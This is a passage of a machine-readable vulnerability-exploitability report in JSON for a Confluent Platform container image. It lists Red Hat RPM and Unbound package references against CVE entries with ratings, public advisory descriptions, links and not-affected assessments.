          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44605",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in the RPM Package Manager (RPM). A local user could be affected by a heap buffer overflow vulnerability when processing a specially crafted NDB database file. This issue arises from an error in how RPM handles certain calculations during file parsing, leading to an incorrect memory allocation. An attacker could leverage this to cause a denial of service, making the system unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44605"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33507"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44605"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482481"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44605"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44605"
        }
      ],
      "published": "2026-08-05T18:17:11+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.14.3-32.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm-build-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm-libs@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/rpm@4.14.3-32.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44608",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        413
      ],
      "description": "NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44608"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44608"
        },
        {
          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44608"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44608"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt"
        }
      ],
      "published": "2026-05-20T10:16:28+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
